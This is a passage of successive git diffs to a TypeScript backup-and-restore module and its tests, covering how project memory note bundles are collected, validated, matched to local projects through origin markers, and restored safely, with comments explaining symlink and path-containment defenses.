+    const error = await captureRejection(collectProjectBundle(muxRoot, [entry]));
+    expect((error as Error).message).toContain("corrupt.md");
+  });
+
   it("skips memory files past the memory read limit only when exporting", async () => {
     const entry = entryFor("/home/dev/src/alpha");
     await writeFixtureFile(muxRoot, `memory/project/${entry.memoryDir}/small.md`, "fine\n");
@@ -3698,6 +3718,9 @@ describe("project bundle", () => {
       `memory/project/${entry.memoryDir}/.env`,
       `memory/project/${entry.memoryDir}/memory-meta.json`,
       `memory/project/${entry.memoryDir}`,
+      // A case variant of the listed directory: a matched restore would write it verbatim
+      // into a directory the project's memory store never reads.
+      `memory/project/${entry.memoryDir.replace(/^alpha/, "Alpha")}/notes.md`,
     ]) {
       await rewriteBundleManifest(managedDir, {
         schemaVersion: 1,

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -3031,14 +3031,22 @@ export class ProjectMemoryRestoreError extends Error {
   }
 }
 
-/** Regular files under a directory, for the per-scope memory file-count cap. */
+/**
+ * Regular files under a directory as MemoryService counts them for its per-scope cap:
+ * dot-prefixed entries (and anything beneath one) are invisible to the memory store, so
+ * counting them here would refuse a note the store itself would still create.
+ */
 async function countFilesUnder(dirAbs: string): Promise<number> {
   // Recursive readdir does not follow directory symlinks, and a missing scope directory
   // counts as empty rather than failing the restore.
   const entries = await fs
     .readdir(dirAbs, { withFileTypes: true, recursive: true })
     .catch(() => []);
-  return entries.filter((entry) => entry.isFile()).length;
+  return entries.filter((entry) => {
+    if (!entry.isFile()) return false;
+    const relative = path.relative(dirAbs, path.join(entry.parentPath, entry.name));
+    return !relative.split(path.sep).some(isHiddenName);
+  }).length;
 }
 
 /**

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -747,7 +747,8 @@ function createBackupFileCollector(root: BackupRoot) {
 
   async function collectDirectory(
     relativeRoot: string,
-    filter: (relativePath: string, entry: Dirent) => boolean
+    filter: (relativePath: string, entry: Dirent) => boolean,
+    collectOptions: { maxFileBytes?: number } = {}
   ): Promise<void> {
     const absoluteRoot = path.join(root.path, ...relativeRoot.split("/"));
     // A symlinked collection root would let readdir walk outside MUX_ROOT, and restore
@@ -769,8 +770,15 @@ function createBackupFileCollector(root: BackupRoot) {
       const relativePath = toPosixPath(relativeRoot, entry.name);
       if (!filter(relativePath, entry)) continue;
       if (entry.isDirectory()) {
-        await collectDirectory(relativePath, filter);
+        await collectDirectory(relativePath, filter, collectOptions);
       } else if (entry.isFile() && !isForbiddenBasename(entry.name)) {
+        // Skipped by size before anything is charged: a file the caller would drop must
+        // not consume the file count or the byte budget, or one corrupted memory file
+        // could block every export.
+        if (collectOptions.maxFileBytes !== undefined) {
+          const stat = await lstatOrNull(path.join(root.path, ...relativePath.split("/")));
+          if (stat !== null && stat.size > collectOptions.maxFileBytes) continue;
+        }
         assertBackupFileCount(files.length + 1);
         pathComplexity.recordFile(relativePath);
         files.push(await readBackupFile(root, relativePath, budget, links));
@@ -2628,17 +2636,20 @@ function assertValidBundleEntryDir(entry: BackupProjectBundleEntry): void {
   }
 }
 
-/** The collision-folded memory directory segment of a bundle file path. */
-function bundleFileDirKey(relativePath: string): string {
-  return collisionKey(relativePath.split("/")[2] ?? "");
+/** The memory directory segment of a bundle file path, exactly as spelled. */
+function bundleFileDirSegment(relativePath: string): string {
+  return relativePath.split("/")[2] ?? "";
 }
 
 export function bundleEntryFiles(
   files: readonly BackupFile[],
   entry: BackupProjectBundleEntry
 ): BackupFile[] {
-  const dirKey = collisionKey(entry.memoryDir);
-  return files.filter((file) => bundleFileDirKey(file.path) === dirKey);
+  // Exact spelling, not the collision-folded key: a matched restore writes these paths
+  // verbatim, so a case- or normalization-variant directory would land files where the
+  // project's memory store never reads them. Reading rejects such files outright.
+  const prefix = `${PROJECT_MEMORY_PATH_PREFIX}${entry.memoryDir}/`;
+  return files.filter((file) => file.path.startsWith(prefix));
 }
 
 /**
@@ -2675,19 +2686,19 @@ export async function collectProjectBundle(
   const collector = createBackupFileCollector(root);
   const sorted = [...entries].sort((a, b) => a.path.localeCompare(b.path));
   for (const entry of sorted) {
-    await collector.collectDirectory(`${PROJECT_MEMORY_PATH_PREFIX}${entry.memoryDir}`, () => true);
+    await collector.collectDirectory(
+      `${PROJECT_MEMORY_PATH_PREFIX}${entry.memoryDir}`,
+      () => true,
+      // Exports skip files the memory subsystem itself refuses to read: bundling them
+      // would produce a backup this build's own restore rejects. Snapshots keep full
+      // fidelity so an overwritten oversized local file stays recoverable.
+      options.skipOversizedMemoryFiles === true ? { maxFileBytes: MEMORY_MAX_FILE_BYTES } : {}
+    );
   }
   collector.assertHardLinksContained();
   // The executable bit is dropped on purpose: memory files are notes, and the bundle
   // manifest does not record modes, so restores always land them non-executable.
   const files = collector.files
-    // Exports skip files the memory subsystem itself refuses to read: bundling them would
-    // produce a backup this build's own restore rejects. Snapshots keep full fidelity so
-    // an overwritten oversized local file stays recoverable.
-    .filter(
-      (file) =>
-        options.skipOversizedMemoryFiles !== true || file.content.length <= MEMORY_MAX_FILE_BYTES
-    )
     .map((file) => ({ path: file.path, content: file.content }))
     .sort((a, b) => a.path.localeCompare(b.path));
   return {
@@ -2810,6 +2821,7 @@ async function readProjectBundleUnchecked(
   const manifest = parseProjectBundleManifest(manifestRaw.content.toString("utf-8"));
 
   const entryDirKeys = new Set<string>();
+  const entryDirs = new Set<string>();
   const entryPaths = new Set<string>();
   for (const entry of manifest.projects) {
     assertValidBundleEntryDir(entry);
@@ -2822,6 +2834,7 @@ async function readProjectBundleUnchecked(
       throw new Error(`Backup project bundle reuses memory directory '${entry.memoryDir}'`);
     }
     entryDirKeys.add(dirKey);
+    entryDirs.add(entry.memoryDir);
   }
 
   assertBackupFileCount(manifest.files.length);
@@ -2830,7 +2843,10 @@ async function readProjectBundleUnchecked(
   const seen = new Set<string>();
   for (const manifestFile of manifest.files) {
     assertAllowedBundleFilePath(manifestFile.path, { portable });
-    if (!entryDirKeys.has(bundleFileDirKey(manifestFile.path))) {
+    // Exact directory spelling: `bundleEntryFiles` associates by exact prefix, so a
+    // case- or normalization-variant of a listed directory would otherwise be a file no
+    // entry owns — accepted, never restored, and invisible to the import token.
+    if (!entryDirs.has(bundleFileDirSegment(manifestFile.path))) {
       throw new Error(
         `Backup project bundle file '${manifestFile.path}' does not belong to a listed project`
       );
@@ -2936,6 +2952,25 @@ export class ProjectMemoryWriteError extends Error {
     this.name = "ProjectMemoryWriteError";
     this.written = progress.written;
     this.skipped = progress.skipped;
+  }
+}
+
+/**
+ * A matched-memory restore that failed after some entries were written. The service's
+ * change notification runs on the success path, so the failure must carry the projects
+ * whose memory already changed or an open memory browser keeps showing stale contents.
+ */
+export class ProjectMemoryRestoreError extends Error {
+  readonly restoredProjectMemory: Array<{ projectPath: string; files: string[] }>;
+
+  constructor(
+    message: string,
+    restoredProjectMemory: Array<{ projectPath: string; files: string[] }>,
+    options?: { cause?: unknown }
+  ) {
+    super(message, options);
+    this.name = "ProjectMemoryRestoreError";
+    this.restoredProjectMemory = restoredProjectMemory;
   }
 }
 

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -3146,6 +3146,17 @@ export async function writeProjectMemoryOrigin(
   // first, and no crash-recovery rule on the source's record can tell an incomplete write
   // from a completed association that another import into the same project superseded.
   // The project's record was the half the import's memory write had already committed to.
+  //
+  // What such a crash does cost is the project's own previous association, if it had one:
+  // its record now names the new source, so its previous source is re-offered as an import
+  // on the next restore, its files intact in the project (an add-only re-import restores the
+  // association). That is deliberate. Recording the previous source for recovery would need
+  // a reader to tell "the new pair never committed" from "it committed and the source later
+  // moved on", and the two files cannot say which — a crash after the commit but before any
+  // cleanup of that recovery state looks identical — so the recovered association could be
+  // one a completed import had superseded, and a matched restore would then overwrite the
+  // project's memory without approval. The records fail toward an explicit re-import, never
+  // toward a match nobody approved.
   const targetRecord = projectMemoryOriginTargetPath(localMemoryDir);
   const previousTarget = await readProjectMemoryOriginRecordBytes(root, targetRecord);
   await writeProjectMemoryOriginRecord(root, targetRecord, content);

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -2771,7 +2771,7 @@ export async function writeProjectBundle(
     if (claimed.has(claim)) throw new Error(`Duplicate backup path '${file.path}'`);
     claimed.add(claim);
   }
-  const manifestJson = `${JSON.stringify(bundle.manifest, null, 2)}\n`;
+  const manifestJson = serializeProjectBundleManifest(bundle.manifest).toString("utf-8");
   // Bound what is published so a bundle that writes is never one every later read rejects.
   const budget = createByteBudget();
   budget(BACKUP_MANIFEST_FILE, Buffer.byteLength(manifestJson, "utf-8"));
@@ -2787,6 +2787,35 @@ export async function writeProjectBundle(
   await writeCheckedFile(root, BACKUP_MANIFEST_FILE, Buffer.from(manifestJson, "utf-8"), false, {
     ownerOnly,
   });
+}
+
+/** The bytes `writeProjectBundle` publishes for the manifest; exported so the secret scan sees them too. */
+export function serializeProjectBundleManifest(manifest: BackupProjectBundleManifest): Buffer {
+  return Buffer.from(`${JSON.stringify(manifest, null, 2)}\n`, "utf-8");
+}
+
+/** Where the bundle manifest lands relative to the managed path. */
+export const PROJECT_BUNDLE_MANIFEST_PATH = `${PROJECT_BUNDLE_DIR}/${BACKUP_MANIFEST_FILE}`;
+
+/**
+ * The checkout side bounds the whole managed tree — core payload, bundle, both manifests —
+ * with one file-count, byte, and path-complexity limit set, while export budgets the two
+ * halves independently. An export both halves accept individually can still exceed the
+ * combined limits, so it is measured here exactly as the next checkout will measure it.
+ */
+export async function assertManagedTreeWithinLimits(destinationDir: string): Promise<void> {
+  const entries = await fs.readdir(destinationDir, { withFileTypes: true, recursive: true });
+  const files = entries.filter((entry) => entry.isFile());
+  assertBackupFileCount(files.length);
+  const relativePaths = files.map((entry) =>
+    path.relative(destinationDir, path.join(entry.parentPath, entry.name)).split(path.sep).join("/")
+  );
+  assertBackupPathComplexity(relativePaths);
+  const budget = createByteBudget();
+  for (const [index, entry] of files.entries()) {
+    const stat = await fs.lstat(path.join(entry.parentPath, entry.name));
+    budget(relativePaths[index] ?? entry.name, stat.size);
+  }
 }
 
 /**
@@ -2960,11 +2989,6 @@ export function planProjectBundleRestore(
 export function rekeyProjectMemoryPath(bundlePath: string, targetDirName: string): string {
   const segments = bundlePath.split("/");
   return [segments[0], segments[1], targetDirName, ...segments.slice(3)].join("/");
-}
-
-/** `memory/project/<dir>/rest` → `rest`, the path a project-scope memory store uses. */
-export function projectMemoryRelPath(bundlePath: string): string {
-  return bundlePath.split("/").slice(3).join("/");
 }
 
 /**

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -2966,11 +2966,29 @@ export function projectImportToken(
   );
 }
 
+/**
+ * A bundle entry the restore writes without approval, and the local project it writes to.
+ * `projectPath`/`localMemoryDir` equal the entry's own path/dir for a project registered at
+ * its recorded path, and the import target's for a project brought in by an earlier import.
+ */
+export interface MatchedProjectEntry {
+  entry: BackupProjectBundleEntry;
+  files: BackupFile[];
+  projectPath: string;
+  localMemoryDir: string;
+}
+
 export interface ProjectBundleRestorePlan {
-  /** Entries registered here at exactly their recorded path and dir name: restored verbatim. */
-  matched: Array<{ entry: BackupProjectBundleEntry; files: BackupFile[] }>;
+  /** Entries with a local project identity: restored verbatim into that project's memory. */
+  matched: MatchedProjectEntry[];
   /** Everything else: never written without an explicit per-entry import approval. */
   imports: Array<{ entry: BackupProjectBundleEntry; files: BackupFile[]; token: string }>;
+}
+
+/** The local project an earlier import created for a recorded source path. */
+export interface ProjectMemoryOrigin {
+  projectPath: string;
+  memoryDir: string;
 }
 
 /**
@@ -2979,21 +2997,107 @@ export interface ProjectBundleRestorePlan {
  * match asserts both "registered at exactly this path" and "the recorded dir name is the
  * one this host computes" — a foreign-OS source path with a correct hash suffix falls
  * through to an import candidate rather than being rejected or silently written.
+ * `origins` (recorded source path → local project) lets a project imported under another
+ * path keep receiving updates on later restores; without it every restore after an import
+ * would re-offer the project as an add-only candidate that can never update a file.
  */
 export function planProjectBundleRestore(
   bundle: BackupProjectBundle,
-  registeredDirByPath: ReadonlyMap<string, string>
+  registeredDirByPath: ReadonlyMap<string, string>,
+  origins: ReadonlyMap<string, ProjectMemoryOrigin> = new Map()
 ): ProjectBundleRestorePlan {
   const plan: ProjectBundleRestorePlan = { matched: [], imports: [] };
   for (const entry of bundle.manifest.projects) {
     const files = bundleEntryFiles(bundle.files, entry);
     if (registeredDirByPath.get(entry.path) === entry.memoryDir) {
-      plan.matched.push({ entry, files });
-    } else {
-      plan.imports.push({ entry, files, token: projectImportToken(entry, bundle.files) });
+      plan.matched.push({
+        entry,
+        files,
+        projectPath: entry.path,
+        localMemoryDir: entry.memoryDir,
+      });
+      continue;
     }
+    const origin = origins.get(entry.path);
+    // The origin's project must still be registered with the dir name this host computes;
+    // a stale marker under an unregistered or renamed directory falls back to an import.
+    if (origin !== undefined && registeredDirByPath.get(origin.projectPath) === origin.memoryDir) {
+      plan.matched.push({
+        entry,
+        files,
+        projectPath: origin.projectPath,
+        localMemoryDir: origin.memoryDir,
+      });
+      continue;
+    }
+    plan.imports.push({ entry, files, token: projectImportToken(entry, bundle.files) });
   }
   return plan;
+}
+
+/** A matched entry's files addressed to the local project's memory directory. */
+export function matchedProjectWrites(
+  match: MatchedProjectEntry
+): Array<{ path: string; content: Buffer }> {
+  return match.files.map((file) => ({
+    path: rekeyProjectMemoryPath(file.path, match.localMemoryDir),
+    content: file.content,
+  }));
+}
+
+/**
+ * Hidden marker inside an imported project's memory directory recording which backed-up
+ * project it came from. Dot-prefixed so MemoryService never lists or counts it and exports
+ * never collect it; it travels with the memory directory and needs no config schema.
+ */
+const PROJECT_MEMORY_ORIGIN_FILE = ".backup-origin.json";
+const MAX_PROJECT_MEMORY_ORIGIN_BYTES = 4096;
+
+export async function writeProjectMemoryOrigin(
+  muxRoot: string,
+  localMemoryDir: string,
+  sourcePath: string
+): Promise<void> {
+  const root = await resolveRoot(muxRoot);
+  const directory = await resolveContainedPath(
+    root.path,
+    `${PROJECT_MEMORY_PATH_PREFIX}${localMemoryDir}`
+  );
+  await fs.mkdir(directory, { recursive: true });
+  await fs.writeFile(
+    path.join(directory, PROJECT_MEMORY_ORIGIN_FILE),
+    `${JSON.stringify({ sourcePath })}\n`,
+    "utf-8"
+  );
+}
+
+/**
+ * Recorded source path → local project, for every registered project whose memory
+ * directory carries an origin marker. Two projects claiming one source keep the first in
+ * path order so the classification is deterministic; an unreadable marker is ignored.
+ */
+export async function readProjectMemoryOrigins(
+  muxRoot: string,
+  registeredDirByPath: ReadonlyMap<string, string>
+): Promise<Map<string, ProjectMemoryOrigin>> {
+  const root = await resolveRoot(muxRoot);
+  const origins = new Map<string, ProjectMemoryOrigin>();
+  const registered = [...registeredDirByPath.entries()].sort(([a], [b]) => a.localeCompare(b));
+  for (const [projectPath, memoryDir] of registered) {
+    const marker = path.join(root.path, "memory", "project", memoryDir, PROJECT_MEMORY_ORIGIN_FILE);
+    const stat = await lstatOrNull(marker);
+    if (stat?.isFile() !== true || stat.size > MAX_PROJECT_MEMORY_ORIGIN_BYTES) continue;
+    let sourcePath: unknown;
+    try {
+      const parsed: unknown = JSON.parse(await fs.readFile(marker, "utf-8"));
+      sourcePath = isPlainObject(parsed) ? parsed.sourcePath : undefined;
+    } catch {
+      continue;
+    }
+    if (typeof sourcePath !== "string" || sourcePath === "" || origins.has(sourcePath)) continue;
+    origins.set(sourcePath, { projectPath, memoryDir });
+  }
+  return origins;
 }
 
 /** `memory/project/<recorded>/rest` re-keyed to the locally computed target directory. */
@@ -3191,33 +3295,33 @@ async function planProjectMemoryWrites(
  */
 export async function collectOverwritableProjectMemory(
   muxRoot: string,
-  matched: ReadonlyArray<{ entry: BackupProjectBundleEntry; files: readonly BackupFile[] }>
+  matched: readonly MatchedProjectEntry[]
 ): Promise<BackupProjectBundle> {
   const root = await resolveRoot(muxRoot);
   const budget = createByteBudget();
   const files: BackupFile[] = [];
   for (const match of matched) {
-    for (const incoming of match.files) {
-      assertAllowedBundleFilePath(incoming.path);
-      const destination = await resolveContainedPath(root.path, incoming.path);
+    for (const write of matchedProjectWrites(match)) {
+      assertAllowedBundleFilePath(write.path);
+      const destination = await resolveContainedPath(root.path, write.path);
       if ((await lstatOrNull(destination))?.isFile() !== true) continue;
-      const current = await readCheckedFile(root, incoming.path, (size) => {
-        budget(incoming.path, size);
+      const current = await readCheckedFile(root, write.path, (size) => {
+        budget(write.path, size);
       });
-      files.push({ path: incoming.path, content: current.content });
+      files.push({ path: write.path, content: current.content });
     }
   }
   files.sort((a, b) => a.path.localeCompare(b.path));
-  const entries = [...matched.map((match) => match.entry)].sort((a, b) =>
-    a.path.localeCompare(b.path)
-  );
+  // Entries describe the LOCAL projects the copy came from, so the recovery copy's manifest
+  // is consistent with its own file paths even for import-matched entries.
+  const entries = [...matched].sort((a, b) => a.projectPath.localeCompare(b.projectPath));
   const manifest: BackupProjectBundleManifest = {
     schemaVersion: 1,
-    projects: entries.map((entry) => ({
-      path: entry.path,
-      name: entry.name,
-      ...(entry.gitRemote !== undefined ? { gitRemote: entry.gitRemote } : {}),
-      memoryDir: entry.memoryDir,
+    projects: entries.map((match) => ({
+      path: match.projectPath,
+      name: match.entry.name,
+      ...(match.entry.gitRemote !== undefined ? { gitRemote: match.entry.gitRemote } : {}),
+      memoryDir: match.localMemoryDir,
     })),
     files: files.map((file) => ({ path: file.path, sha256: sha256(file.content) })),
   };

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -3058,6 +3058,53 @@ export async function writeProjectMemoryFiles(
   options: { addOnly: boolean }
 ): Promise<{ written: string[]; skipped: string[] }> {
   const root = await resolveRoot(muxRoot);
+  // Re-run under the lock even when the caller already ran it as a preflight: the
+  // destinations may have changed since, and these checks are what make the write safe.
+  const planned = await planProjectMemoryWrites(root, writes);
+  const written: string[] = [];
+  const skipped: string[] = [];
+  try {
+    for (const write of planned) {
+      if (write.exists) {
+        const current = await readCheckedFile(root, write.path, () => undefined);
+        if (current.content.equals(write.content)) continue;
+        if (options.addOnly) {
+          skipped.push(write.path);
+          continue;
+        }
+      }
+      await writeCheckedFile(root, write.path, write.content, false);
+      written.push(write.path);
+    }
+  } catch (error) {
+    // Sequential writes without rollback: report what already landed so the caller's
+    // failure result can double as the cleanup list.
+    throw new ProjectMemoryWriteError(
+      error instanceof Error ? error.message : String(error),
+      { written, skipped },
+      { cause: error }
+    );
+  }
+  return { written, skipped };
+}
+
+/**
+ * Everything about a set of project-memory writes that can be refused without touching the
+ * disk: path shape, the memory subsystem's per-file size and per-scope count limits, and
+ * destinations that are not plain files. Exposed so the restore preflight can refuse a
+ * bundle that would fail here before the core restore has overwritten anything.
+ */
+export async function assertProjectMemoryWritesAllowed(
+  muxRoot: string,
+  writes: ReadonlyArray<{ path: string; content: Buffer }>
+): Promise<void> {
+  await planProjectMemoryWrites(await resolveRoot(muxRoot), writes);
+}
+
+async function planProjectMemoryWrites(
+  root: BackupRoot,
+  writes: ReadonlyArray<{ path: string; content: Buffer }>
+): Promise<Array<{ path: string; content: Buffer; exists: boolean }>> {
   // Charged so a marker-thin bundle cannot expand past the same bound reads enforce.
   const budget = createByteBudget();
   // Everything refusable is refused before the first write, so a rejected bundle
@@ -3098,29 +3145,48 @@ export async function writeProjectMemoryFiles(
       );
     }
   }
-  const written: string[] = [];
-  const skipped: string[] = [];
-  try {
-    for (const write of planned) {
-      if (write.exists) {
-        const current = await readCheckedFile(root, write.path, () => undefined);
-        if (current.content.equals(write.content)) continue;
-        if (options.addOnly) {
-          skipped.push(write.path);
-          continue;
-        }
-      }
-      await writeCheckedFile(root, write.path, write.content, false);
-      written.push(write.path);
+  return planned;
+}
+
+/**
+ * A recovery copy of exactly the local files a matched restore may overwrite: the current
+ * contents at the incoming bundle paths, and nothing else in the project's memory
+ * directory. Collecting whole directories would let an unrelated local-only note — say,
+ * one past the backup size budget — fail a restore that never touches it.
+ */
+export async function collectOverwritableProjectMemory(
+  muxRoot: string,
+  matched: ReadonlyArray<{ entry: BackupProjectBundleEntry; files: readonly BackupFile[] }>
+): Promise<BackupProjectBundle> {
+  const root = await resolveRoot(muxRoot);
+  const budget = createByteBudget();
+  const files: BackupFile[] = [];
+  for (const match of matched) {
+    for (const incoming of match.files) {
+      assertAllowedBundleFilePath(incoming.path);
+      const destination = await resolveContainedPath(root.path, incoming.path);
+      if ((await lstatOrNull(destination))?.isFile() !== true) continue;
+      const current = await readCheckedFile(root, incoming.path, (size) => {
+        budget(incoming.path, size);
+      });
+      files.push({ path: incoming.path, content: current.content });
     }
-  } catch (error) {
-    // Sequential writes without rollback: report what already landed so the caller's
-    // failure result can double as the cleanup list.
-    throw new ProjectMemoryWriteError(
-      error instanceof Error ? error.message : String(error),
-      { written, skipped },
-      { cause: error }
-    );
   }
-  return { written, skipped };
+  files.sort((a, b) => a.path.localeCompare(b.path));
+  const entries = [...matched.map((match) => match.entry)].sort((a, b) =>
+    a.path.localeCompare(b.path)
+  );
+  return {
+    manifest: {
+      schemaVersion: 1,
+      projects: entries.map((entry) => ({
+        path: entry.path,
+        name: entry.name,
+        ...(entry.gitRemote !== undefined ? { gitRemote: entry.gitRemote } : {}),
+        memoryDir: entry.memoryDir,
+      })),
+      files: files.map((file) => ({ path: file.path, sha256: sha256(file.content) })),
+    },
+    files,
+  };
 }

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -2847,16 +2847,14 @@ export async function assertManagedTreeWithinLimits(destinationDir: string): Pro
 /**
  * Existence is checked without parsing, so a malformed sidecar can be reported as present
  * while `includeProjects` is off without ever blocking a core-only restore on its contents.
+ * "Present" is anything at the sidecar path: a symlink or a stray file there is a bundle
+ * the full read refuses, and the toggle-off report should say so rather than "none".
  */
 export async function projectBundleExists(sourceDir: string): Promise<boolean> {
-  // lstat at both levels, never stat: on hosts where git materializes symlinks, a crafted
-  // sidecar directory or manifest pointing at a UNC path would otherwise be followed here —
-  // reached even with project backup off — and Windows would start SMB authentication. A
-  // symlinked directory or manifest is treated as absent; the full read refuses it anyway.
-  const bundleDir = path.join(sourceDir, PROJECT_BUNDLE_DIR);
-  if ((await lstatOrNull(bundleDir))?.isDirectory() !== true) return false;
-  const stat = await lstatOrNull(path.join(bundleDir, BACKUP_MANIFEST_FILE));
-  return stat?.isFile() === true;
+  // lstat, never stat: on hosts where git materializes symlinks, a crafted sidecar pointing
+  // at a UNC path would otherwise be followed here — reached even with project backup off —
+  // and Windows would start SMB authentication.
+  return (await lstatIfExists(path.join(sourceDir, PROJECT_BUNDLE_DIR))) !== null;
 }
 
 function parseProjectBundleManifest(raw: string): BackupProjectBundleManifest {
@@ -2897,6 +2895,10 @@ function parseProjectBundleManifest(raw: string): BackupProjectBundleManifest {
  * Reads and fully validates the sidecar, or returns null when the backup carries none.
  * Callers gate this on `includeProjects`: with the toggle off the sidecar is never parsed,
  * so a malformed bundle cannot block a core-only restore.
+ *
+ * "None" means nothing at the sidecar path. Anything else there — a symlink, a file, a
+ * directory without its manifest — is a bundle the read below refuses: reading it as absent
+ * would apply the core restore while silently omitting every backed-up project.
  */
 export async function readProjectBundle(
   sourceDir: string,
@@ -2921,6 +2923,11 @@ async function readProjectBundleUnchecked(
   const budget = createByteBudget();
   const root = await resolveRoot(bundleDir);
   await resolveContainedPath(root.path, BACKUP_MANIFEST_FILE);
+  // Explicit, so a sidecar directory without its manifest is an invalid bundle rather than
+  // an ENOENT surfacing as an I/O failure.
+  if ((await lstatIfExists(path.join(root.path, BACKUP_MANIFEST_FILE)))?.isFile() !== true) {
+    throw new Error("Backup project bundle has no manifest");
+  }
   const manifestRaw = await readCheckedFile(root, BACKUP_MANIFEST_FILE, (size) => {
     budget(BACKUP_MANIFEST_FILE, size);
   });
@@ -3114,6 +3121,14 @@ export async function writeProjectMemoryOrigin(
   // corrupted Xum home) would otherwise be followed, and an approved import would replace a
   // file outside the memory tree with backup-controlled JSON.
   await resolveContainedPath(root.path, relativePath);
+  // The newest explicit association is the only one kept. A marker left by an earlier
+  // import of this source — its project since unregistered, or still registered — would
+  // otherwise survive as a second claim: re-registering that project later would make the
+  // source ambiguous, or match whichever project sorted first and overwrite its memory in
+  // matched mode without any approval.
+  for (const claim of await listProjectMemoryOriginClaims(root, sourcePath)) {
+    if (claim !== relativePath) await fs.unlink(absolutePathOf(root.path, claim));
+  }
   await writeCheckedFile(
     root,
     relativePath,
@@ -3122,38 +3137,72 @@ export async function writeProjectMemoryOrigin(
   );
 }
 
+/** Root-relative paths of every marker recording `sourcePath`, whichever project they name. */
+async function listProjectMemoryOriginClaims(
+  root: BackupRoot,
+  sourcePath: string
+): Promise<string[]> {
+  const entries = await fs
+    .readdir(absolutePathOf(root.path, PROJECT_MEMORY_ORIGINS_DIR), { withFileTypes: true })
+    .catch((error: unknown) => {
+      if (isErrnoWithCode(error, "ENOENT") || isErrnoWithCode(error, "ENOTDIR")) return [];
+      throw error;
+    });
+  const claims: string[] = [];
+  for (const entry of entries) {
+    // Dirent reports a symlink as neither file nor directory, so links are never read.
+    if (!entry.isFile() || !entry.name.endsWith(".json")) continue;
+    const relativePath = `${PROJECT_MEMORY_ORIGINS_DIR}/${entry.name}`;
+    if ((await readProjectMemoryOriginSource(root, relativePath)) === sourcePath) {
+      claims.push(relativePath);
+    }
+  }
+  return claims;
+}
+
+/** The source a marker records, or null for a missing, unreadable, refused, or malformed one. */
+async function readProjectMemoryOriginSource(
+  root: BackupRoot,
+  relativePath: string
+): Promise<string | null> {
+  try {
+    // The checked reader refuses a symlinked directory or marker the same way the writer
+    // does, so a planted link cannot re-point a project at another source.
+    const { content } = await readCheckedFile(root, relativePath, (size) => {
+      if (size > MAX_PROJECT_MEMORY_ORIGIN_BYTES) throw new Error("origin marker too large");
+    });
+    const parsed: unknown = JSON.parse(content.toString("utf-8"));
+    const sourcePath = isPlainObject(parsed) ? parsed.sourcePath : undefined;
+    return typeof sourcePath === "string" && sourcePath !== "" ? sourcePath : null;
+  } catch {
+    return null;
+  }
+}
+
 /**
  * Recorded source path → local project, for every registered project whose memory
- * directory carries an origin marker. Two projects claiming one source keep the first in
- * path order so the classification is deterministic; an unreadable marker is ignored.
+ * directory carries an origin marker. A source claimed by two registered projects is
+ * ambiguous and left unmatched (both are re-offered as imports): the writer removes older
+ * claims, so this arises only from a copied home or hand-placed markers, and picking one
+ * lexically would overwrite an arbitrary project's memory in matched mode without approval.
  */
 export async function readProjectMemoryOrigins(
   muxRoot: string,
   registeredDirByPath: ReadonlyMap<string, string>
 ): Promise<Map<string, ProjectMemoryOrigin>> {
   const root = await resolveRoot(muxRoot);
+  const claims = new Map<string, ProjectMemoryOrigin[]>();
+  for (const [projectPath, memoryDir] of registeredDirByPath) {
+    const sourcePath = await readProjectMemoryOriginSource(
+      root,
+      projectMemoryOriginPath(memoryDir)
+    );
+    if (sourcePath === null) continue;
+    claims.set(sourcePath, [...(claims.get(sourcePath) ?? []), { projectPath, memoryDir }]);
+  }
   const origins = new Map<string, ProjectMemoryOrigin>();
-  const registered = [...registeredDirByPath.entries()].sort(([a], [b]) => a.localeCompare(b));
-  for (const [projectPath, memoryDir] of registered) {
-    let sourcePath: unknown;
-    try {
-      // The checked reader refuses a symlinked directory or marker the same way the
-      // writer does, so a planted link cannot re-point a project at another source.
-      const { content } = await readCheckedFile(
-        root,
-        projectMemoryOriginPath(memoryDir),
-        (size) => {
-          if (size > MAX_PROJECT_MEMORY_ORIGIN_BYTES) throw new Error("origin marker too large");
-        }
-      );
-      const parsed: unknown = JSON.parse(content.toString("utf-8"));
-      sourcePath = isPlainObject(parsed) ? parsed.sourcePath : undefined;
-    } catch {
-      // Missing, unreadable, or refused: the project simply has no recorded origin.
-      continue;
-    }
-    if (typeof sourcePath !== "string" || sourcePath === "" || origins.has(sourcePath)) continue;
-    origins.set(sourcePath, { projectPath, memoryDir });
+  for (const [sourcePath, projects] of claims) {
+    if (projects.length === 1) origins.set(sourcePath, projects[0]);
   }
   return origins;
 }

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -3007,26 +3007,35 @@ export function planProjectBundleRestore(
   origins: ReadonlyMap<string, ProjectMemoryOrigin> = new Map()
 ): ProjectBundleRestorePlan {
   const plan: ProjectBundleRestorePlan = { matched: [], imports: [] };
-  for (const entry of bundle.manifest.projects) {
-    const files = bundleEntryFiles(bundle.files, entry);
+  // One local project receives at most one entry: a project recorded directly at a path
+  // that an earlier import also targets would otherwise merge two entries' notes into one
+  // memory scope. The exact-path match wins; the colliding entry is re-offered as an import.
+  const claimed = new Set<string>();
+  const localIdentity = (entry: BackupProjectBundleEntry): ProjectMemoryOrigin | null => {
     if (registeredDirByPath.get(entry.path) === entry.memoryDir) {
-      plan.matched.push({
-        entry,
-        files,
-        projectPath: entry.path,
-        localMemoryDir: entry.memoryDir,
-      });
-      continue;
+      return { projectPath: entry.path, memoryDir: entry.memoryDir };
     }
     const origin = origins.get(entry.path);
     // The origin's project must still be registered with the dir name this host computes;
     // a stale marker under an unregistered or renamed directory falls back to an import.
-    if (origin !== undefined && registeredDirByPath.get(origin.projectPath) === origin.memoryDir) {
+    return origin !== undefined && registeredDirByPath.get(origin.projectPath) === origin.memoryDir
+      ? origin
+      : null;
+  };
+  const entries = bundle.manifest.projects.map((entry) => ({ entry, local: localIdentity(entry) }));
+  for (const { entry, local } of entries) {
+    if (local !== null && local.projectPath === entry.path) claimed.add(local.projectPath);
+  }
+  for (const { entry, local } of entries) {
+    const files = bundleEntryFiles(bundle.files, entry);
+    const viaOrigin = local !== null && local.projectPath !== entry.path;
+    if (local !== null && (!viaOrigin || !claimed.has(local.projectPath))) {
